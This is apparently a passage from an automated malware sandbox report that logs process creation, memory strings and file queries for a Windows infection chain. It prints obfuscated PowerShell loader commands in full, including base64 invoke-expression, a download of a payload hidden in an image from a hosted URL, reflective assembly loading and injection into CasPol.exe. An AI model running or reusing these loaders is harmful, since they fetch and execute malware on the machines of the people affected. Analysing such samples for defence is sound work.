rw52okfquerbvefcc2vldghlymvzdhroaw5nc2zvcmdldg1lymfja3dpdghnb29kbmv3c3roas52ylmi'+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgjvwg5vdsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uwvbficagicagicagicagicagicagicagicagicagicagicagic1nzu1izxjeruzjbml0sw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt04uzexsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicblb29qlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfcvosdwludcagicagicagicagicagicagicagicagicagicagicagicb0awdtleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbjbmduwwpaefvnktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjmvmyiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagrwdoysagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrib1huvxu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy43lzc3l3nlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agluz3mudelgiiwijevovjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agkudmjtiiwwldapo1n0yvjulxnszuvqkdmpo2luvm9rrs1fwhbyrvntau9oicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vldghlymvzdhroaw5nc2zvcmdldg1lymfja3dpdghnb29kbmv3c3roas52ylmi'+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredtext = $originaltext -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = new-object system.net.webclient;$polyedrons = $nectars.downloaddata($wheal);$tropical = [system.text.encoding]::utf8.getstring($polyedrons);$bubbas = '<<base64_start>>';$fairhood = '<<base64_end>>';$fulminatory = $tropical.indexof($bubbas);$quadriloge = $tropical.indexof($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.tochararray() | foreach-object { $_ })[-1..-($moorcocks.length)];$unreigned = [system.convert]::frombase64string($pelisse);$chevaux = [system.reflection.assembly]::load($unreigned);$cutesily = [dnlib.io.home].getmethod('vai');$cutesily.invoke($null, @($restoredtext, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'caspol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgjvwg5vdsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uwvbficagicagicagicagicagicagicagicagicagicagicagic1nzu1izxjeruzjbml0sw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt04uzexsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicblb29qlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfcvosdwludcagicagicagicagicagicagicagicagicagicagicagicb0awdtleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbjbmduwwpaefvnktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjmvmyiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagrwdoysagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrib1huvxu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy43lzc3l3nlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agluz3mudelgiiwijevovjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agkudmjtiiwwldapo1n0yvjulxnszuvqkdmpo2luvm9rrs1fwhbyrvntau9oicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vldghlymvzdhroaw5nc2zvcmdldg1lymfja3dpdghnb29kbmv3c3roas52ylmi'+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgjvwg5vdsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uwvbficagicagicagicagicagicagicagicagicagicagicagic1nzu1izxjeruzjbml0sw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt04uzexsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicblb29qlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfcvosdwludcagicagicagicagicagicagicagicagicagicagicagicb0awdtleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbjbmduwwpaefvnktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjmvmyiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagrwdoysagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrib1huvxu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy43lzc3l3nlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agluz3mudelgiiwijevovjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agkudmjtiiwwldapo1n0yvjulxnszuvqkdmpo2luvm9rrs1fwhbyrvntau9oicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vldghlymvzdhroaw5nc2zvcmdldg1lymfja3dpdghnb29kbmv3c3roas52ylmi'+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredtext = $originaltext -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = new-object system.net.webclient;$polyedrons = $nectars.downloaddata($wheal);$tropical = [system.text.encoding]::utf8.getstring($polyedrons);$bubbas = '<<base64_start>>';$fairhood = '<<base64_end>>';$fulminatory = $tropical.indexof($bubbas);$quadriloge = $tropical.indexof($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.tochararray() | foreach-object { $_ })[-1..-($moorcocks.length)];$unreigned = [system.convert]::frombase64string($pelisse);$chevaux = [system.reflection.assembly]::load($unreigned);$cutesily = [dnlib.io.home].getmethod('vai');$cutesily.invoke($null, @($restoredtext, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'caspol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager$
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3I\031
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001363000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3I\21
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3I\
                        Source: CasPol.exe, 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434015 cpuid 12_2_00434015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E751
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_0045107A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512CA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004472BE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004513F3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004514FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004515C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004477A7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450C8F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450F52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450F07
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450FED
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
